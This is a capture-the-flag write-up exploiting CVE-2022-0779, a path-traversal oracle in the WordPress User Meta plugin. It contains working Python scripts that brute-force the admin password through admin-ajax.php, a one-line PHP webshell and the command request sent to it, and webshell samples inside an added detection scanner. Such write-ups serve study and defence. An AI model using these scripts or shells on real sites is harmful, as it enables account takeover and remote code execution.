[Strong Net Cup 2022] WP-UM
2022-08-05 10:03:00 【Landasika】
Target: WordPress with the User Meta (Lite/Pro) plugin 2.4.3, path traversal / file enumeration, CVE-2022-0779
Initialize the challenge first.
Get the administrator's password
Register a user and log in.
Capture the upload request from the profile upload form, forward it, and intercept the follow-up packet with action=um_show_uploaded_file.
The administrator's username can be read from the home page.
CVE-2022-0779: the filepath parameter of the um_show_uploaded_file AJAX action is not validated, so any logged-in user can point it at an arbitrary path with ../ sequences. The response contains a Remove link if the file exists and nothing otherwise, which turns the endpoint into a file-existence oracle.
In this challenge the password is stored one character per file under /password/, with each file named <position><character> (the script's filepath pattern /password/<i><c>), so every position can be recovered by probing /password/1a, /password/1b, ... until Remove appears.
Brute-force the password:
import requests

# Character set tried for each password position (letters only, per the challenge)
lis = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
password = ''
url = "http://ip:port/wp-admin/admin-ajax.php"
# Headers copied from the intercepted um_show_uploaded_file request of the logged-in user;
# the Cookie (and the pf_nonce below) must be replaced with the ones from your own session
header = {
    'Host': 'ip:port',
    'X-Requested-With': 'XMLHttpRequest',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Origin': 'http://ip:port',
    'Referer': 'http://ip:port/index.php/upload/',
    'Cookie': 'wordpress_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C773b42bf40849a9d6365ec60b43eb256204f1c41a3c52103702ac0ea8b910a85; wordpress_logged_in_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C46c1c28f20badcb553d1aef7f4ee2f926b5a6b9cb83e0f934a230f38d30a88cc'
}
for i in range(1, 16):
    for s in lis:
        # CVE-2022-0779: filepath is not validated, so ../ reaches /password/<i><char>;
        # the response contains "Remove" only when that file exists
        datas = ("field_name=upload&filepath=/../../../../../../../password/" + str(i) + s
                 + "&field_id=um_field_2&form_key=upload&action=um_show_uploaded_file"
                 + "&pf_nonce=8a8f9c780f&is_ajax=true")
        result = requests.post(url, data=datas, headers=header)
        if 'Remove' in result.text:
            password += s
            break
print(password)
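A generalized form of the same oracle, added here as an example (it is not part of the original writeup). It separates the file-existence check (POST to admin-ajax.php, look for "Remove") from the guessing loop, so the same code can probe any path, and the transport is injectable: the run below uses a constructed stand-in for the vulnerable endpoint, so it needs no network. The nonce, field id and cookie names are placeholders that must be taken from the captured upload request of your own session; the seven-level traversal prefix and the /password/<position><char> layout are those the writeup used.

```python
import string
from posixpath import normpath
from typing import Callable
from urllib.parse import parse_qs, urlencode

# Traversal prefix as used in the writeup (seven levels were enough to reach "/").
TRAVERSAL = "/" + "../" * 7

# Challenge layout per the writeup: one file per password character under
# /password/, named <position><character> (e.g. /password/1a).
PASSWORD_DIR = "password"

Probe = Callable[[str], str]   # form body -> response HTML


def build_probe_body(path: str, nonce: str, field_id: str = "um_field_2") -> str:
    """Form body for the um_show_uploaded_file AJAX action (CVE-2022-0779).

    Only `filepath` matters for the oracle; `pf_nonce` and `field_id` must be
    copied from the captured upload request of the logged-in session.
    """
    return urlencode({
        "field_name": "upload",
        "filepath": TRAVERSAL + path.lstrip("/"),
        "field_id": field_id,
        "form_key": "upload",
        "action": "um_show_uploaded_file",
        "pf_nonce": nonce,
        "is_ajax": "true",
    }, safe="/")


def file_exists(path: str, probe: Probe, nonce: str) -> bool:
    """The plugin renders a 'Remove' link only when the path exists."""
    return "Remove" in probe(build_probe_body(path, nonce))


def recover_password(probe: Probe, nonce: str,
                     charset: str = string.ascii_letters, max_len: int = 16) -> str:
    """Brute-force one position at a time; stops at the first position with no
    hit, so the length need not be known in advance (the writeup fixed it at 15)."""
    password = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if file_exists(f"{PASSWORD_DIR}/{pos}{ch}", probe, nonce):
                password += ch
                break
        else:
            break  # no file for this position: end of password
    return password


def http_probe(ajax_url: str, cookies: dict) -> Probe:
    """Live transport: POST to wp-admin/admin-ajax.php with the logged-in cookies.
    requests is imported lazily so the simulated run needs no network library."""
    import requests
    session = requests.Session()
    session.cookies.update(cookies)
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    return lambda body: session.post(ajax_url, data=body, headers=headers).text


def simulated_target(existing_files: set) -> Probe:
    """Constructed stand-in for the vulnerable endpoint (a test fixture, not the
    plugin's code): resolves the traversal and answers with a Remove link when
    the requested path is in `existing_files`."""
    def respond(body: str) -> str:
        requested = normpath(parse_qs(body)["filepath"][0])
        if requested in existing_files:
            return '<a href="#" class="um-remove-file">Remove</a>'
        return ""
    return respond


if __name__ == "__main__":
    # Constructed sample filesystem: password "sec" plus one real-looking system file.
    fs = {"/password/1s", "/password/2e", "/password/3c", "/etc/passwd"}
    oracle = simulated_target(fs)
    print(file_exists("etc/passwd", oracle, "8a8f9c780f"))   # True
    print(recover_password(oracle, "8a8f9c780f"))             # sec
    # Live use (cookie name/value from your own session):
    # oracle = http_probe("http://ip:port/wp-admin/admin-ajax.php",
    #                     {"wordpress_logged_in_<hash>": "<value>"})
```

Against a live target each probe is one authenticated POST, so a 52-character alphabet costs up to 52 requests per position; the stop-on-miss loop avoids the fifteen wasted rounds the fixed-length version makes once the password ends.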
Upload a webshell
Log in as the administrator and change the upload field's allowed file types in the User Meta settings so that the PHP file is accepted.
Then open the profile update page.
Upload a one-line PHP webshell (一句话木马).
Get the flag
Go to wp-content/uploads/file/2.php; the shell evaluates the PHP passed in cmd, here system("grep -r flag{ /usr/*"):
wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);
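The upload-and-execute step from both sides, as an added example that is not part of the original writeup. The page never shows the shell's source; from the cmd=system(...) request it is taken here to be eval($_GET['cmd']), which is an assumption. The first two helpers decode and build the cmd parameter; find_webshells is the defender's counterpart, a scan of a wp-content/uploads tree for the two things this attack leaves behind (an executable PHP file under uploads, or PHP code hidden in a non-PHP file), run here over a constructed temporary directory.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import quote, unquote

# The request shown on the page, as sent: the one-liner evaluates whatever PHP
# arrives in `cmd`, here a recursive grep for the flag.
PAGE_CMD = "system(%22grep%20-r%20flag{%20/usr/*%22);"


def decode_cmd(query_value: str) -> str:
    """What the shell will eval, given the raw cmd= value from a URL."""
    return unquote(query_value)


def build_shell_url(shell_url: str, php: str) -> str:
    """URL that makes an eval($_GET['cmd']) one-liner run `php` (assumed shell body)."""
    return f"{shell_url}?cmd={quote(php, safe='')}"


# Detection side: a one-line shell is request input flowing into a code or
# command sink. Both halves must be present to count, which keeps noise down.
SINK = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b", re.I)
EXEC_EXT = {".php", ".phtml", ".php3", ".php5", ".php7", ".phar"}


def looks_like_webshell(source: str) -> bool:
    return bool(SINK.search(source)) and bool(REQUEST_INPUT.search(source))


def find_webshells(upload_root: str) -> dict:
    """Walk an uploads tree and report files that should not be there:
    anything with an executable PHP extension, and any other file (e.g. an
    image polyglot) that carries PHP with an input->sink pattern."""
    root = Path(upload_root)
    hits = {}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        src = p.read_text(errors="ignore")   # tolerate binary content
        if p.suffix.lower() in EXEC_EXT:
            hits[rel] = "executable PHP extension under uploads"
        elif "<?php" in src and looks_like_webshell(src):
            hits[rel] = "PHP with request input feeding a code/command sink"
    return hits


def make_sample_uploads() -> str:
    """Constructed fixture (not from the page): a small wp-content/uploads tree."""
    root = Path(tempfile.mkdtemp(prefix="uploads_"))
    (root / "files").mkdir()
    (root / "2022" / "08").mkdir(parents=True)
    # the one-liner the page's cmd=system(...) request implies (assumed body)
    (root / "files" / "2.php").write_text("<?php eval($_GET['cmd']); ?>")
    # a plain image, a JPEG-header polyglot with a shell appended, and a text note
    (root / "2022" / "08" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)
    (root / "2022" / "08" / "poly.jpg").write_bytes(b"\xff\xd8\xff\xe0<?php system($_POST['c']); ?>")
    (root / "2022" / "08" / "notes.txt").write_text("system requirements: PHP 7.4")
    return str(root)


if __name__ == "__main__":
    print(decode_cmd(PAGE_CMD))   # system("grep -r flag{ /usr/*");
    print(build_shell_url("http://ip:port/wp-content/uploads/files/2.php", 'system("id");'))
    for path, why in sorted(find_webshells(make_sample_uploads()).items()):
        print(f"{path}: {why}")
```

The pattern scan catches the textbook one-liner and the image polyglot but not an obfuscated shell (base64 in a variable, string concatenation of the sink name), so treat it as triage. The control that actually closes this path is to deny PHP execution under wp-content/uploads at the web server and to keep the plugin's allowed-type list to data files, since the attack only needed an admin toggle to get a .php past the upload field.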